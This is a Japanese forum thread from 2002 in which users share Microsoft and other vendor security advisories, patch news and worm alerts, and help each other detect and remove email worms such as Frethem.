修正は、この脆弱性を解決しますが、影響を受けるコントロールが再導入される
場合があることをお知らせしました。このため、影響を受けるコントロールが
再導入されることを確実に防ぐため、新しい修正をリリースします。新しい MSN
チャット コントロール、更新された修正プログラム、MSN Messenger の
アップデートされたバージョンおよび Exchange Instant Messenger の
アップデートされたバージョンが利用可能になりました。2002 年 5 月 8 日
(米国日付) にリリースされた修正のいずれかを適用しているお客様は
アップデートされた修正を適用することを検討して下さい。
237 :
むむむ ◆MUMUMU4w :02/06/20 11:16 ID:7ymBNPv1
238 :
名無しさん@お腹いっぱい。 :02/06/20 11:33 ID:5XmnkdrJ
>>237 補足:
Word/Excelともインストール途中でOfficeのCDの挿入を促されることはないようです。
>>239 うーむ、デスクトップでは言われなかったのに、ノートPCでは言われた。
環境依存かも。
241 :
170 :02/06/21 12:49 ID:???
>240 管理者用のアップデートのやり方は、どっかに出てました?
242 :
むむむ ◆MUMUMU4w :02/06/21 18:24 ID:gQkxrqKm
>>241 昔あったfixのアップデート方法ですが、これと同じでいいと思います。
www.microsoft.com/japan/support/ kb/articles/JP300/5/53.htm
>243 thx!
245 :
名無しさん@お腹いっぱい :02/06/24 21:02 ID:pO9E2yW4
>>1 無駄な努力だ。Windows使ってる時点であきらめろ。
ルーター2本刺し+ファイアーウォール構築(フィルタリング)くらいだろ?
他には人間工学的スキルを学ぶことだな。
ウィルス感染にしても実は後者の方が問題なのだよ。
初期設定のままブラウジングして、ウィルスと知らずにクリックするヴァカが後を絶たないよ。
どうしても気になるならMacを使え。
ほとんど意識しなくても大丈夫なレベルにまでセキュリティーが高くなる。
悪意→Mac陽性(Virii潜伏)→Win発症の感染経路にだけ注意すればよい。
246 :
名無しさん@お腹いっぱい :02/06/27 04:13 ID:nO5pkhhI
Norton先生、ドザー完全制覇!
247 :
名無しさん@お腹いっぱい。 :02/06/27 11:35 ID:/X4cPHHL
PE.Mtx.A WORM.MTX.A という2つのウイルスに感染してしまったのですが、 どうしたら駆除できるのでしょうか? これらは、重大なウイルスですか?
248 :
名無しさん@お腹いっぱい。 :02/06/27 12:40 ID:1MNaNXUs
■Windows Media Playerに新たな脆弱性
米Microsoftは6月26日、Windows Media Player(WMP)に新たに3つの脆弱
性が発見されたと報告した。最悪の場合、攻撃者によるコード実行に悪用
されることがあるという。
同社はこの脆弱性を「深刻度=高」に指定、WMP用の累積パッチをリリース
した。影響を受けるソフトはWMP 6.4、WMP 7.1、WMP for Windows XP。
http://www.zdnet.co.jp/news/0206/27/nebt_13.html
249 :
名無しさん@お腹いっぱい。 :02/06/27 12:46 ID:1MNaNXUs
■Microsoft Commerce Server2000/2002に新たな脆弱製
米Microsoftは6月26日、Microsoft Commerce Server2000/2002に、攻撃
者のコード実行を許す4つの脆弱性が発見されたと報告した。「深刻度=高」
に指定されている。Microsoftは同サーバソフトを使うシステム管理者に、た
だちにパッチをインストールするよう促している。
http://www.zdnet.co.jp/news/0206/27/nebt_13.html
SPAM君の実態 isweb41.infoseek.co.jp/computer/jogdial/c1002s/cgi-bin/upld/imgboard.cgi
>>248 >>249 どうもです。今週は私のアクティビティが低いので、助かります。
特に、WMP のやつは絶対当てないといかんですね。
252 :
むむむ ◆MUMUMU4w :02/06/28 18:51 ID:XtH49po2
253 :
むむむ ◆MUMUMU4w :02/06/28 18:51 ID:XtH49po2
254 :
CHANCE FOR EVERYONE :02/06/28 19:00 ID:st+XFGjG
落合信彦は、 今は、1000年に一度の変革期だと発言している。
すべては変わる。時代は変わった。
といったのは、堺屋太一。
この変革期はチャンスでもあります。
あなたも、チャンスをここからスタートさせませんか?
http://ailove22.fc2web.com/lpd/index.html このウェブを読んで考えてみてください
かき食えば、金が鳴るなり、法隆寺。
書き加えれば、金が生るなり、ホームページ。
255 :
名無しさん@お腹いっぱい :02/06/29 10:58 ID:W8feG1di
変革期には耕耘機が似合う
256 :
名無しさん@お腹いっぱい :02/06/29 23:21 ID:suf3DMWM
しかしマイクロソフトの製品はセキュリティーの脆弱性はひどいな。 こんなソフトウェアを公開実験してる時点ですでに犯罪だよ。 と思ったら、今度はWindowsMediaPlayerで深刻度「高」だって。ヤレヤレ どうせまたWindowsバンドルと独自規格の採用で、 MS製の劣った製品を標準にしようと画策してるんだろうけど、 MPEG-4に勝利してもらいたいよね。
257 :
名無しさん@お腹いっぱい :02/06/29 23:28 ID:suf3DMWM
それにしてもWindowsプラットフォームは、 ここ最近、ウィルスだのセキュリティーだのと問題がちょっと多すぎるぞ。 市場に対して唯一圧倒的な独占商品なんだから、もうちょっと何とかならんものかね? つーかなんで独自規格を拡張→規格無視→Windowsにバンドル→裁判→数年後デファクトスタンダードするわけ? いつもこの手で不当競争を仕掛ける史上最悪の独占企業だよ。 マイクロソフトなんか潰れちゃえ! ここの社員も最悪。
バグが多すぎて、IE6.0SP1がリリース出来ないんだと。
259 :
名無しさん@お腹いっぱい :02/06/30 06:29 ID:BLSw2uMo
バグを仕様、セキュリティーホールを公開実験と言い切るMSの電話サポート
260 :
名無しさん@お腹いっぱい。 :02/06/30 07:17 ID:bNLja3rp
ポテチキャラのネーミングを「ひろゆき」に!
ttp://www.yamayoshi.co.jp/ ポテトチップス「うわさのレモンペッパー」のキャラクターの名前を募集しています。
好きなキャラクターの名前を選択して投票してください。
ステキな特製マグカッププレゼント致します。
質問:あなた思うキャラの名前は何?
現在:「ひろゆき」3票。1位獲得まであと185票。
上記コピペしまくりましょう。
>>260 山芳製菓株式会社のホームページへのアクセスに
よるデータの流出についてのお詫びとご報告
平成14年7月2日
山芳製菓株式会社のホームページサーバーより、ホームページ上の
「うわさのレモンペッパーキャンペーン」に、ご応募頂いたデータ
が流出するという事態が発生し、皆様にご迷惑をお掛けしたことを
深くお詫び申し上げます。そのような事態が発生致しましたのは、
弊社ホームページ上のセキュリティ管理の甘さに原因があったと、
深く反省しております。
この件に関する窓口と致しまして、専用ホットラインのメールアド
レスを設定させて頂きます。(下記ご参照お願い申し上げます。)
セキュリティを強化し今後このようなことがないよう対応してまい
りたいと思います。そのため、しばらくの間ホームページは閉鎖さ
せていただきますのでご了承お願い致します。
262 :
名無しさん@お腹いっぱい :02/07/03 05:36 ID:S56/p5dQ
Windowsはスパイウェアです。プライバシー漏洩が仕事です。 セキュリティーとはプライバシー漏洩を妨げるルーターやファイアーウォールを駆逐することです。 ウィルスはWindowsの友達です。
263 :
http://js-web.cside.com/index.html :02/07/03 05:48 ID:lwe+XVgh
264 :
むむむ ◆MUMUMU4w :02/07/04 22:14 ID:+E9Mng2X
■Windows NT/2000/XP のセキュリティパッチ(MS02-029)が更新、再適用が必要な模様
>>199 で報告した、MS02-029 が本日付で更新されています。
パッチのアップデートがあった模様。パッチの再適用が必要になるようです。
情報元(有料サイト):
http://www.computerworld.jp/contents/subscribed/200207/20020704ms2.html 以下、
http://www.microsoft.com/japan/technet/security/bulletin/ms02-029.asp より引用:
-- 引用開始
リモート アクセス サービスの電話帳の未チェックのバッファによりコードが実行される
(Q318138) (MS02-029)
登録日 : 2002/6/13
更新日 : 2002/7/4
概要 :
このセキュリティ情報の対象となるユーザー : MicrosoftR Windows NTR、WindowsR
2000 および Windows XP を使用しているお客様
脆弱性の影響 : ローカルでの権限の昇格
最大深刻度 : 高
推奨する対応策 : 管理者は、特権を持たないユーザーが対話的にログオンすることが
できるマシン (ワークステーションや Terminal Server など) に修正プログラムを適用して
下さい。
影響を受けるソフトウェア :
Microsoft Windows NT 4.0
Microsoft Windows NT 4.0 Terminal Server Edition
Microsoft Windows 2000
Microsoft Windows XP
Windows NT 4.0 Service Pack 6 または NT 4.0 Terminal Server Edition Service Pack 6
にインストールできる Microsoft Routing and Remote Access Server (英語版のみ :
こちらの製品は日本語版は存在しませんので、ご注意ください。提供される修正プログラム
も英語版のみです。本セキュリティ情報の英語版を、併せてご参照ください。)
問題 :
技術的な説明 :
2002 年 6月 12 日 (米国日付)、マイクロソフトはこのセキュリティ情報の最初のバージョン
をリリースしました。2002年 7 月 2 日 (米国日付)、この問題に対する修正プログラムが
更新され、入手可能になったことをお知らせするため、このセキュリティ情報を更新しました。
この問題に対する最初の修正プログラムでは、この脆弱性を完全に排除することができ
ましたが、管理者以外のユーザーが VPN 接続を確立することができなくなることがある、
という別の影響が発生しました。更新版の修正プログラムは、VPN 接続を適切に処理
します。更新版の修正プログラムは、ダウンロード センターから今すぐダウンロードする
ことができ、Windows アップデートからは間もなく入手可能になる予定です。
265 :
名無しさん@お腹いっぱい :02/07/04 22:18 ID:5mn0RoMV
パンチョ伊東死去
266 :
むむむ ◆MUMUMU4w :02/07/04 22:33 ID:+E9Mng2X
>>264 WinXPとWin2000日本語版のパッチはとりあえず(まだ?)更新されてない模様。
267 :
名無しさん@お腹いっぱい :02/07/05 07:04 ID:vlu1LIqg
セキュリティーホールが恐かったらMS製品は使うな。
>>267 怖いんではなくて、楽しんでいるんでし。
269 :
むむむ ◆MUMUMU4w :02/07/10 21:51 ID:56KqQXVj
■WinAMPにセキュリティホール、Exploitコードが公開
--- 引用開始
Summary
Winamp includes an option, enabled by default, which checks on startup for the latest
version from
http://www.winamp.com and will then notify the user of a possible
upgrade via a message box. Unfortunately, if it were to receive a huge response,
the thread parsing the data is thrown into an infinite loop and eventually the exception
dispatcher is called. Then like most of the time, an overflow will occur.
--- 引用終了
以上、Remote Winamp Exploit (Product Updates)
http://www.securiteam.com/exploits/5BP07207PE.html (英語)
より一部引用。
既に上記サイトに C のコードも出ています。注意されたし。
なんだか知らんが、奇っ怪なインデントをしてるソースだなぁ・・・ アメリカ人はこんなコーディングをするんだろうか。
271 :
:02/07/10 22:33 ID:???
>>270 全然奇っ怪でも何でもないじゃん。GPLなソフトのソースよりはずっと読みやすいぞ。
>>271 ん?無茶苦茶ズレて見えるんだけどナ。
ブラウザのせいかな。
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-034ov.asp MS02-034 に関する情報
「MS02-034: SQL Server 7.0 および SQL Server 2000 用の累積的なプログラム
(Q322853)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
概要
====
この問題は、下記対象となる製品に含まれる未チェックのバッファにより、
不正なプログラムの実行および権限の昇格が行われる可能性があります。
これらが悪用される事で、悪意のあるユーザーによりお客様のコンピュータ上で
任意のプログラムを高い権限の下で実行される可能性があります。
対象となる製品
==============
・ Microsoft SQL Server 2000
・ Microsoft SQL Server Desktop Engine (MSDE) 2000
修正プログラム
==============
・ Microsoft SQL Server 2000
http://download.microsoft.com/download/SQLSVR2000/Update/8.00.0650/W98NT42KMeXP/JA/8.00.0650_jpn.exe Microsoft SQL 2000 Service Pack 2 の環境にインストールすることが
可能です。
詳細
====
この修正プログラムをインストールすることにより、悪意のあるユーザーによる
以下の攻撃を防ぐことができます。
(中) 資格情報を暗号化するためのプロシージャの脆弱性を悪用しバッファの
オーバーラン攻撃が行われる可能性のある問題です。
(中) SQL Server テーブルのデータの一括アップデートの処理の脆弱性を
悪用しバッファのオーバーラン攻撃が行われる可能性のある問題です。
(中) SQL Server が使用するレジストリキーへのアクセス権が
不適切であったために、悪意のあるユーザーにより、サービスアカウントと
同等の権限を取得される可能性がある問題です。
対策が行われていないシステムがインターネットなどのネットワークを通じて、
他のコンピュータと接続している場合、この問題を使用した悪影響を
受けることがあります。 この攻撃は、ハッカーまたはクラッカーと呼ばれる
悪意のあるユーザーや、ワームといった自動的な攻撃を目的とした悪意のある
プログラムから行われることがあります。
・ 意図しないアプリケーションが動作させられる可能性があります
(ハードディスクのフォーマットやワームなど)
・ 意図しないスクリプトが動作させられる可能性があります
・ データベース内のデータを閲覧・操作される可能性があります。
・ データベースを異常終了させられる可能性があります。
・ 異常終了が原因で、データベース内のデータに不整合が発生する可能性があります。
日本語による詳細については、ただいま準備中です。
それまでの間、英語情報をご参照ください。
MS02-034: Cumulative Patch for SQL Server 7.0 and SQL Server 2000 (Q322853)
http://www.microsoft.com/technet/security/bulletin/MS02-034.asp
MS02-035 に関する情報
「MS02-035: SQL Server のインストール プロセスで、暗号化した管理者の
パスワードがシステムに残る (Q263968)」 に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
概要
====
Microsoft SQL Server をインストールする際に、認証モードに「混合モード」を
選択した場合、セットアップファイルに管理者 (sa) のパスワードが
保存される問題です。 最悪の場合、悪意のあるユーザーにお客様の
Microsoft SQL Server の管理者パスワードを入手される可能性があります。
対象となる製品
==============
・ Microsoft SQL Server 7
・ Microsoft Data Engine 1.0 (MSDE 1.0)
・ Microsoft SQL Server 2000
修正プログラム
==============
KillPwd.exe を使用することによって、セットアップファイルに残った
管理者 (sa) のパスワードを削除します。
・ Microsoft SQL 7 、MSDE 1.0 and Microsoft SQL 2000
http://download.microsoft.com/download/SQLSVR2000/Utility/2.0/W98NT42KMeXP/EN-US/killpwd.exe Killpwd.exe の詳細に関しましては、次のサポート技術情報を
参照ください。
JP263968: [FIX] Service Pack インストール時に標準セキュリティのパスワードが
保存される
http://www.microsoft.com/japan/support/kb/articles/JP263/9/68.asp 詳細
====
この修正プログラムをインストールすることにより、
悪意のあるユーザーによる以下の攻撃を防ぐことができます。
(中)混合モードでインストールされた Microsoft SQL Server の
セットアップファイルに、管理者 (sa) のパスワードが保存される問題です。
上記の問題を悪用されることにより以下のような実害を受ける可能性があります。
・ 実行する意図が無いアプリケーションが動作させられる可能性があります
(ハードディスクのフォーマットやワームなど)
・ 実行する意図が無いスクリプトが動作させられる可能性があります
・ SQL Server の管理者権限を取得される可能性があります
日本語による詳細については、ただいま準備中です。
それまでの間、英語情報をご参照ください。
MS02-035: SQL Installation Process May Leave Encrypted Administrator
Password on System (Q263968)
http://www.microsoft.com/technet/security/bulletin/MS02-035.asp
>>272 <PRE>で書いてくれって感じだよな・・・。
276 :
名無しさん@お腹いっぱい。 :02/07/12 09:51 ID:yRpIVQ2I
278 :
むむむ ◆MUMUMU4w :02/07/13 00:59 ID:P/3TgfL1
279 :
むむむ ◆MUMUMU4w :02/07/13 01:11 ID:P/3TgfL1
■RealOne Player Gold および RealJukebox 2 のバッファ オーバーフローに関する脆弱性
2002 年 7 月 10 日更新
2002 年 6 月 17 日に RealJukebox 2 および RealOne Player Gold に影響を与えるセキュ
リティホールがRealNetworks に報告されました。
内容:
1. 「バッファオーバーラン」として知られているセキュリティホールによって、攻撃者により、
ユーザーのマシン上で任意のコードが実行される恐れがあります。
2. 攻撃者は、My Computer のセキュリティ領域に HTML ページをロードし、ユーザーの
マシンでコードを実行することにより、ブラウザのセキュリティ設定をすり抜けることが可能
です。
現在のところ、実際にこのセキュリティホールによって攻撃されたという報告は受けており
ませんが、RealNetworks ではこの問題を特定し、修正いたしました。
(中略)
影響を受けるソフトウェア:
RealOne Player Gold
Windows 用英語(US)版 バージョン6.0.10.505
RealJukebox2
Windows 用 日本語版 バージョン1.0.2.379
Windows 用 英語(US)版 バージョン1.0.2.340
RealJukebox 2 Plus
Windows 用 日本語版 バージョン1.0.2.379
Windows 用 英語(US)版 バージョン1.0.2.340
(以上、RealNetworksサポートサイトより一部引用―全文は引用元を参照)
引用元:
http://service.jp.real.com/help/faq/security/rjb2.html
280 :
名無しさん@お腹いっぱい。 :02/07/13 01:38 ID:kvjf1pPr
こうしてみてみると、セキュリティーホールやらバグやら多すぎ
281 :
名無しさん@お腹ぐるぐる :02/07/13 13:00 ID:VMUtPCoc
Intel サーバおちてませんか
282 :
むむむ ◆MUMUMU4w :02/07/15 16:43 ID:orOUoNFJ
283 :
むむむ ◆MUMUMU4w :02/07/15 17:17 ID:orOUoNFJ
284 :
名無しさん@お腹いっぱい。 :02/07/15 18:48 ID:KmXtLdb1
285 :
マカー :02/07/15 18:58 ID:TF+ZSQom
今日はウィルスですか ウィナーは毎日大変ですね(プッ
286 :
名無しさん@お腹いっぱい。 :02/07/15 20:33 ID:4WQTacLn
ははは
sage
288 :
名無しさん@お腹いっぱい :02/07/15 22:53 ID:zG/IpKvd
2ちゃんから何かニュース出ました?
289 :
名無しさん@お腹いっぱい。 :02/07/15 22:58 ID:oX2A4OZi
>>238-238 家にも来た!このウィルス
OutlookExpressアップデートしてたから、
被害は無いが、
念の為スキャンしたりで禿げしく鬱
皆さんもWindowsUpdateは細めに!
もしくは、IEとOEは使うな。
290 :
名無しさん@お腹いっぱい。 :02/07/15 23:11 ID:CXhXQ/GS
>>289 マジ?
よかったッ!!
俺、友達いなくて・・・
291 :
名無しさん@お腹いっぱい。 :02/07/15 23:12 ID:4W0QKGT5
292 :
名無しさん@お腹いっぱい。 :02/07/15 23:20 ID:gIES7VDJ
>>282 全く知らんメアドからこのメールきた。
fromヘッダ偽装すんの?偽装したようなメアドじゃなかったけど。
293 :
名無しさん@お腹いっぱい。 :02/07/15 23:37 ID:N2w2rhrM
>>292 最近のウイルスはIEのキャッシュからメアドを拾ってくるようですので。。
294 :
名無しさん@お腹いっぱい。 :02/07/15 23:56 ID:gIES7VDJ
うわ〜「Re:Your Password!」モロに感染してしまいました・・鬱 どうすればいいんでしょうか?
298 :
ひよこ@525 :02/07/16 07:58 ID:eEORyHpK
299 :
ぴょんた :02/07/16 10:18 ID:NasO/gud
300 :
むむむ ◆MUMUMU4w :02/07/16 11:38 ID:k0zmKt1e
301 :
名無しさん@お腹いっぱい。 :02/07/16 14:58 ID:IIRuuNaw
W32/Frethem.k@MM このウィルス、昨日あたりからキョーレツに流行ってるみたい。 かなりしっかりしたウィルス対策してる会社でも 感染した輩がいたよ。んでもってウチにも今朝、そのウィルス メールが来てた。件名ですぐ分かったから速攻削除したけど…。
302 :
名無しさん@お腹いっぱい。 :02/07/16 16:47 ID:bDI7plCr
IEのセキュリティを突くようなデモをしているサイトを 教えて欲しいのですが・・・。
304 :
名無しさん@お腹いっぱい。 :02/07/17 00:27 ID:Vf6cNc7n
俺もメール来てオンラインスキャンで検索したら感染されてなかったけど だいじょうぶかな、不安。誰か教えて下さい。
>>304 来たメールをどう扱ったかによる。あと、使ってるメーラー。
その辺教えてくれないとなんとも言いようがない。
306 :
304 :02/07/17 00:46 ID:Vf6cNc7n
>>305 レスありがとうございます
メールは見ただけなんですが、添付ファイルは開いてません。
あと、outlookです。
オンラインウィルススキャンでだいじょうぶでも実際は感染してる事って
あるんですか?
>>306 以下、トレンドマイクロのページより。
--
・侵入方法:
ワームは通常メールの添付ファイルとしてユーザのコンピュータに侵入します。
IEのセキュリティホ ールを狙ったダイレクトアクション活動を行いますので
添付ファイルを実行したつもりがなくともワー ムが活動してしまう場合があります。
--
という事で、添付ファイル実行しなくても危険かも。
で、
--
・感染確認方法:
ワームが活動してしまった場合には、以下のファイルが作成されます:
<Windowsディレクトリ>¥Taskbar.exe
--
これ確認汁。win98/me/xp とかなら c:\windows、nt/2000 だと c:;\winnt。
まぁ、オンラインスキャンかけて大丈夫なら OK だと思うけど。
308 :
名無しさん@お腹いっぱい。 :02/07/17 02:45 ID:ewA1qeI5
309 :
304 :02/07/17 13:00 ID:OjcQLbIq
>>307 遅レスですいません
添付開かなくても感染するんですよね、作成ファイルを確認したところ大丈夫でした
いろいろと教えて頂いてありがとうございました、助かりました!
310 :
名無しさん@お腹いっぱい。 :02/07/18 01:18 ID:P/k5cP9K
WORM_FRETHEM.Kに 感染してしまいました。オンラインスキャン で検出したのですが、削除しようとすると 使用中の為削除できませんと出てしまいます。 どうすれば良いのでしょうか。マジレスお願いします。
>>310 ・
>>303 を試す
・セーフモードで起動して削除
・DOSの起動ディスク作ってDOSで起動してDELコマンドで削除
漏れは寝るんで後は誰かよろしく
312 :
これってなんでしょうか? :02/07/18 01:29 ID:y04HqrZj
誰か教えてください。 この質問をソニーの社員スレッドでしたのですが全然回答がありませんでした。 なにか重大な秘密があるのでしょうか? 私はVAIOを使ってます。 最近監視ソフト買いました。 毎日インターネットつなげるとアタックの警告音とともにVAIOの方から勝手に パソコンの中に何度も進入してきます。 私のパソコンの中でいったい何をしているのでしょうか? ソニーさんのパソコンを使うと勝手にパソコンに侵入してこれるように 何かしているのでしょうか? 侵入の警告音がなりっぱなして気持ち悪いです。
313 :
名無しさん@お腹いっぱい。 :02/07/18 01:30 ID:ZNU+KZty
>>312 ( ゚д゚)ポカーン
VAIOから攻撃されているという根拠は?
だいいち、自分のパソコンが自分のパソコンに攻撃できると思う?
どうせポートスキャンでもくらっているのだろう
315 :
むむむ ◆MUMUMU4w :02/07/18 14:40 ID:gBTxHBzv
316 :
むむむ ◆MUMUMU4w :02/07/18 14:57 ID:gBTxHBzv
■GFI Software Ltd.、eメールの脅威に対抗するエクスプロイト エンジンをリリース
GFI Software Ltdが、Exchangeサーバ/SMTPサーバ用のeメール セキュリティ製品、
GFI MailSecurity for Exchange/SMTPを発表した。同製品にはeメール エクスプロイ
エンジンが提供されており、eメールに埋め込まれた脆弱性につけこむ部分(エクス
プロイト)を検出し、既知のエクスプロイトで攻撃する現在および将来のウィルスから
ユーザを保護する。
エクスプロイトが埋め込まれたeメールをユーザが受信したり開いたりすると、ウィルスが
ユーザのマシン上で実行されてしまう。悪意のあるハッカーはこの手法を使って、ファイア
ウォールやアンチウィルス製品をすり抜ける。
アンチウィルス ソフトウェアは既知の悪意のあるコードを検出するが、eメール エクス
プロイト エンジンは、eメールに対する侵入検知システム(IDS)のように機能し、コードを
分析して悪意のあるエクスプロイトを発見する。これにより、新しいウィルスだけでなく、
未知のウィルスや悪意のあるコードからもユーザを保護できる。
(以上、2002年7月18日のGMO Silicon Valley Expressより一部引用―全文は引用元を参照
)
引用元:
http://sve.gmo.jp/a.php?i=1479 GFI:
http://www.gfi.com/
ここ1週間何もなしか。平和でよし
良スレあげ
319 :
名無しさん@お腹いっぱい。 :02/07/27 19:42 ID:rJJPcyg0
>>317 平和というより、アップデートパッチの開発が滞ってるだけかと。
320 :
むむむ ◆MUMUMU4w :02/07/29 13:09 ID:CW4yZDlS
321 :
むむむ ◆MUMUMU4w :02/07/29 13:11 ID:CW4yZDlS
322 :
むむむ ◆MUMUMU4w :02/07/29 13:55 ID:CW4yZDlS
323 :
むむむ ◆MUMUMU4w :02/07/29 13:56 ID:CW4yZDlS
324 :
むむむ ◆MUMUMU4w :02/07/29 13:57 ID:CW4yZDlS
325 :
むむむ ◆MUMUMU4w :02/07/29 15:02 ID:CW4yZDlS
■Windows Media Player のセキュリティパッチが更新
# 既にWindows Updateにも出ています。
最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-032.asp ================================================================
今回の更新内容
このセキュリティ情報ページを改訂し、MS01-056 で提供された修正プログラムに
不足していたファイルがあったことをお知らせしました。マイクロソフトは
修正プログラムを再パッケージし、不足していたファイルを含め、確実な累積的な
修正プログラムとして再リリースしました。
また、「すべての問題の総合的な深刻度」 を示す表を修正しました。
================================================================
2002 年 6 月 26 日 Windows Media Player 用の累積的な修正プログラム
(Q320920) (MS02-032)
登録日 : 2002/6/27
更新日 : 2002/7/26
概要 :
このセキュリティ情報の対象となるユーザー : Microsoft(R) Windows Media
(TM) Player 6.4、7.1 または Windows Media Player for Windows XP を
使用しているお客様
(中略)
最大深刻度 : 高
(中略)
影響を受けるソフトウェア :
・ Microsoft Windows Media Player 6.4
・ Microsoft Windows Media Player 7.1
・ Microsoft Windows Media Player for Windows XP
技術的な説明 :
2002 年 6 月 26 日 (米国日付)、マイクロソフトはこのセキュリティ情報の
最初のバージョンをリリースし、累積的な修正プログラムとして提供された
修正プログラムであると説明しました。その後、マイクロソフトは修正
プログラムにファイルが不足していたことを発見しました。次に説明する新し
い脆弱性に対する修正プログラムとして、不足していたファイルによる影響は
ありませんが、提供した修正プログラムは累積的ではなかったということに
なります。具体的には、最初の修正プログラムはマイクロソフト
セキュリティ情報 MS01-056 で説明したすべての修正を含んでいませんでした。
(以下略)
326 :
マックユーザー :02/07/29 15:56 ID:/tQqdN2V
毎日ご苦労様 Windowsってのは仕事してるんだかセキュリティ対策してるんだか…
329 :
327 :02/07/29 19:52 ID:???
スマソ。つられてしまい増田
330 :
むむむ ◆MUMUMU4w :02/07/29 21:45 ID:EOFazFzP
■IEとWindows Media Playerのセキュリティホールを利用したウイルス
トレンドマイクロは、新種ウイルス「WORM_MANYMIZE.A(メニーマイズ)」の発見を報告
した。Internet Explorer(IE)とWindows Media Playerそれぞれのセキュリティホールを
利用したウイルスのため、注意が必要であるという。
このウイルスは、件名が「How are you !! <受信者名>」「My friend, <受信者名>」
「Hello <受信者名>」「Dear <受信者名>」のいずれかであり、「mi2.exe」「mi2.chm」
「mi2.htm」「mi2.wmv」という4つのファイルが添付されたEメールとしてユーザーのもとに
送付される。IEのバージョンが古い場合、Eメールをプレビュー表示するだけで
WORM_MANYMIZE.Aに感染してしまう。また、Windows Media Playerの脆弱性も利用
しており、添付された4つのファイルのうち、「mi2.wmv」を実行した場合もウイルスに
感染する。トレンドマイクロによれば、Windows Media Playerのセキュリティホールを
利用したウイルスは初めてであり、今後このようなウイルスがインターネット上に公開
されることで被害が拡大していくおそれがあるとしている。
(以上、2002年7月29日のBroadband Watchより一部引用―全文は引用元を参照)
引用元:
http://www.watch.impress.co.jp/broadband/news/2002/07/29/manymize.htm
331 :
むむむ ◆MUMUMU4w :02/07/29 23:23 ID:EOFazFzP
332 :
名無しさん@お腹いっぱい。 :02/07/30 01:44 ID:VbwAoz3F
なんか、最近MSは現実逃避してるっぽいよね。対応がさ。 「もうだめだー。カーネルからやり直しだー」と思ってるけど 「ちゃんとやってますから。ノートン博士いれときゃ大丈夫です」って言わなきゃいけないってーか
333 :
むむむ ◆MUMUMU4w :02/07/30 23:26 ID:f4O6lCD8
■Windows XPのプログラムキーを装ったウイルス「QDel254」に注意
日本ネットワークアソシエイツ株式会社は7月30日、WindowsXPのプロダクトキー生成
ツールを装ったウイルス「QDel254」に注意を促している。別名「DOAL(ドール)」。
このウイルスは、ローカルハードディスクのファイルを削除するトロイの木馬型ウイルス。
Windows XP Home Edition のキー生成プログラムを装う特徴を持っている。WindowsXP
では違法コピー防止のため、プロダクトキーを入手する際にオンライン接続が必要。
そのため、違法コピーソフトを入手しようとする者に感染するおそれがある。
(以上、2002年7月30日のNet Securityより一部引用―全文は引用元を参照)
引用元:
https://www.netsecurity.ne.jp/article/1/6144.html
334 :
sp3 :02/07/31 14:41 ID:fHMzIs/h
>>334 SP3出ましたか。日本版はいつでしょうね。
□□………………………………………………………………………………………………
□◆ Windows 2000 SP3の開発が完了
□□………………………………………………………………………………………………
Windows 2000向けの次期サービス・パックとして開発が進められていたサービス・
パック3(SP3)の開発が完了したようだ。まだ正式に紹介するページは作られていな
いが,英語版に関してはすでにWebサイト上からダウンロードできるようになってい
る(該当サイト)。
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20020731/1/
336 :
むむむ ◆MUMUMU4w :02/07/31 22:43 ID:nJ46MAcA
337 :
むむむ ◆MUMUMU4w :02/08/01 11:08 ID:dKsMgbzL
338 :
:02/08/01 13:57 ID:ccRlHGqq
ハングル版の 266 従軍慰安婦について 2だ の946でパソコンが やられてしっまった。 あれは、ウィルスですか。
信用できないドメインのexeをいきなり落とすなって……
340 :
名無しさん@お腹いっぱい。 :02/08/02 00:15 ID:5yzGthgs
>>336 ITProの最新情報で、2000SP3は今月9日、日本語版配布開始ってあったぞ
341 :
名無しさん@お腹いっぱい。 :02/08/02 00:18 ID:5yzGthgs
>>325 Windows Media Player 7.1
今すぐダウンロードする wm320920_71.exe - 1,423 Kb
しかし、実際落ちてきたのは1389KB。BitとByteの違い??
342 :
名無しさん@お腹いっぱい。 :02/08/02 02:04 ID:VpQYcJ8d
>>341 ファイルサイズを1000で割るか1024で割るかの違い。
343 :
に :02/08/02 10:41 ID:Aa9ZtlYl
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 202.233.192.0-202.233.255.0
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)
m. [運用責任者] KH071JP
n. [技術連絡担当者] AI018JP
p. [ネームサーバ] ns1.hyper.web.ad.jp
p. [ネームサーバ] ns2.hyper.web.ad.jp
y. [通知アドレス]
[email protected] [割当年月日] 2000/05/11
[最終更新] 2001/01/23 16:51:10 (JST)
[email protected]
344 :
名無しさん@お腹いっぱい。 :02/08/02 10:43 ID:Aa9ZtlYl
↑富士通が折れのPCにアクセスしてくる
346 :
名無しさん@お腹いっぱい。 :02/08/02 15:55 ID:Z8IVGFAx
>346 いかにもなファイルですな
>>345 はいふって言われても
おじさんISDNだからこまっちゃうなぁ。
また、
オプション付けてダウンロードしないと、
インストーラーだけしかダウンロードできない奴なんですかネェ?
350 :
むむむ ◆MUMUMU4w :02/08/04 23:18 ID:NqyOHE7z
>>350 に、クロスサイトスクリプティングの脆弱性が存在するとのこと。
の行を入れ忘れました。スマソ。
352 :
むむむ ◆MUMUMU4w :02/08/05 11:54 ID:3Iq1phV9
若干旧聞ですが。一応。
■『iPlanet』と『Netscape』、両サーバーソフトに脆弱性
『iPlanet Enterprise Web Server』と『Netscape Enterprise Server』の Web Publisher 機能
に、サーバーをブルートフォースアタック (総当たり型アカウント解析攻撃) に晒しかねない
脆弱性が発見された。
コンピュータ緊急対応センター (CERT/CC) が2日リリースした警告によると、サーバーが
HTTP ベーシック認証を利用するよう設定されている場合、攻撃者が繰り返し不正認証の
企てを行なう可能性があるという。
この脆弱性がもたらすリスクは HTTP ベーシック認証を利用した他のブルートフォース
アタックと変わらないが、予期しない攻撃手段の利用を許してしまう可能性もあると、
CERT は警戒を呼びかけている。
この脆弱性は、セキュリティ専門会社の ProCheckup が見つけたもの。『Windows NT』
ベースの OS 版の『iPlanet Web Server, Enterprise Edition』と『Netscape Enterprise
Server』に影響を及ぼすという。
